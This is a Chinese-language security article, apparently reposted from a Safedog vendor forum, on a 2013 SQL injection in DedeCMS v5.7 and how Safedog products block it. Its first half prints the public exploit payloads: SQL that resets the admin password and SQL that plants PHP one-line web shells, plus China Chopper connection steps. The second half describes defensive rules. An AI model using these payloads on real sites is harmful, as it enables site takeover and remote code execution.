dedecms漏洞



      首先我們一起來了解下 DedeCMS v5.7漏洞情況:


        1、漏洞描述

       漏洞所在版本:DedeCMS v5.7



       漏洞發布時間:20130607



      漏洞修復版本:DedeCMS v5.7 20130607之后版本



       漏洞觸發條件:確保php.ini中使用php_mysql.dll同時未開啟php_mysqli.dll

 

       漏洞觸發根源:在於/include/dedesql.class.php 文件中程序未初始化 $arrs1$arrs2 這兩個數組,結合程序不安全的參數處理機制,導致我們能夠覆蓋程序中任意全局變量。因此我們可通過控制全局變量$GLOBALS['cfg_dbprefix']的值,進而通過$prefix值和/plus/download.php中的SQL語句構造,從而造成了此SQL注入漏洞。



       由於DedeCMS使用廣泛,而此高危注入漏洞利用方便,並且能夠因此遠程獲取到管理后台管理員,或者可getshell獲取到系統的控制權。網上已公開的有以下3EXP


       1.1修改后台管理員

      (1)如:構造如下注入SQL語句:
cfg_dbprefixadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1
#修改后台管理員為:用戶名spider,密碼admin

 

     (2)對應的EXP:

 

    (3)執行EXP后,相應后台數據庫表變為如下:


   (4)因此相應后台登錄用戶變為spider密碼admin


     1.2通過/plus/mytag_js.php文件生成一句話木馬php

    (1)如:構造如下注入SQL語句:


cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php eval($_POST[mybak]);?>'');{/dede:php}') # @`\'`


   (2)對應的EXP:


     ( 3 )執行 EXP 后,將向數據庫表 dede_mytag 中插入一條記錄,如圖:


    (4)執行如下語句,在/plus目錄下生成mybak.php一句話木馬


    (5)使用菜刀工具進行連接
http://www.test.com/dedecms5.7/plus/mybak.php  密碼:mybak


     1.3使/plus/ad_js.php文件變為一句話木馬php

    (1)如:構造如下注入SQL語句:
cfg_dbprefixmyad` SET `normbody` = '<?php eval($_POST[m]);?>' WHERE `aid` =1 #


    (2)對應的EXP:


    ( 3 )執行 EXP 后,將向數據庫表 dede_myad 中插入一條記錄,如圖;


    (4)使用菜刀工具進行連接
http://www.test.com/dedecms5.7/plus/ad_js.php?aid=1  密碼:m


        那要怎樣防范這種高危注入漏洞呢?下面我們一起來看看解決方法:


        2、使用安全狗軟件防護該漏洞

        由於攻擊者可能通過該漏洞進行各種惡意攻擊,並因此對網站造成較大的風險危害。為最大程度減少這種可能性,用戶可使用安全狗軟件對網站進行了以下全方位的防護。


        2.1網站安全狗--網站漏洞EXP規則防護

     ( 1)安裝網站安全狗 3.0版本,安裝完成后,打開網站安全狗界面並修改網站保護級別為: 高級(即開啟所有防護),如下圖:



      (2)切換界面:主動防御—SQL注入防護,查看規則列表中是否有相應“Dedecms5.7版本exp注入漏洞”防護規則。


        若無, 可點擊如下圖所示“在線更新防護規則”按鈕,然后點擊“保存”按鈕完成更新防護規則列表 如下圖所示:


     (3)在完成以上操作后,我們打開瀏覽器輸入 DedeCMS 5.7注入漏洞 EXP,出現下圖內容,這也說明該攻擊已被網站安全狗攔截。


        2.2網站安全狗--一句話木馬防護

        若是在使用網站安全狗進行防護之前,網站已被植入一句話木馬;或者攻擊者可能繞過前面的網站漏洞 EXP規則防護,向網站植入了一句話木馬。此時可以使用網站安全狗的 第二重防護:一句話木馬防護,通過攔截菜刀等工具連接和命令執行,來阻止攻擊行為。具體如下:


      ( 1)打開網站安全狗界面,確認當前網站保護級別為:高級(即開啟所有防護),如下圖:


       (2)切換到主動防御界面,點擊“在線更新防護規則”確認防護規則為最新版本。使用菜刀工具連接一句話木馬,出現如下圖畫面,可見菜刀工具的連接已被網站安全狗攔截防護。


      (3)若是攻擊者繞過了菜刀工具連接防護,則網站安全狗將繼續對菜刀工具的命令執行行為進行攔截阻止。
       在菜刀工具操作界面,右擊“更新緩存”命令,如下圖:
       


         


        菜刀工具將出現如下界面,表明菜刀工具的命令執行已被網站安全狗攔截防護,以阻止攻擊者的進一步操作。


   


        2.3利用服務器安全狗的文件目錄保護功能阻止未知攻擊

       如上可知,該 Dedecms5.7注入漏洞有在網站目錄下生成一句話木馬的 EXP,針對該情況,用戶也可用服務器安全狗的文件目錄保護功能對該類型 EXP進行防護。


      (1)安裝服務器安全狗,安裝完成后,打開服務器安全狗界面,通過服務器安全狗 -主動防御 -文件及目錄保護 -網站保護規則,手動新增規則:“ Dedecms5.7版本系統 exp規則”,將監控目錄設置為 DedeCMS網站站點的目錄,並勾選禁止寫入、禁止創建,如下圖:


     (2)文件(夾)名包含的字符設置為: *,文件擴展名規則設置為: php|asp|aspx|asa|asax|ascx|ashx|asmx|cdx|cer|cgi|jsp,如下圖:


      (3)通過以上規則設置后,在網站被攻擊者使用以下漏洞EXP類型時,
http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013,   服務器安全狗就可直接攔截,避免攻擊者在網站/plus目錄下生成*.php*.asp*.aspx*.asa*.asax*.ascx*.ashx*.asmx*.cdx*.cer*.cgi*.jsp等類型的一句話木馬文件,從而避免被進一步通過菜刀等工具獲取到系統控制權。

        點擊下載規則:  禁止在Dedecms目錄下創建非法文件.rar (520 Bytes, 下載次數: 1699)      (登陸論壇后可下載該規則



        備注:快速添加以上防護規則:直接使用服務器安全狗--主動防御--文件及目錄保護界面的“導入規則”功能導入下載的xml文件格式規則,並點擊修改導入的規則. (注意把規則中的保護目錄換成您自己網站的目錄)








免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM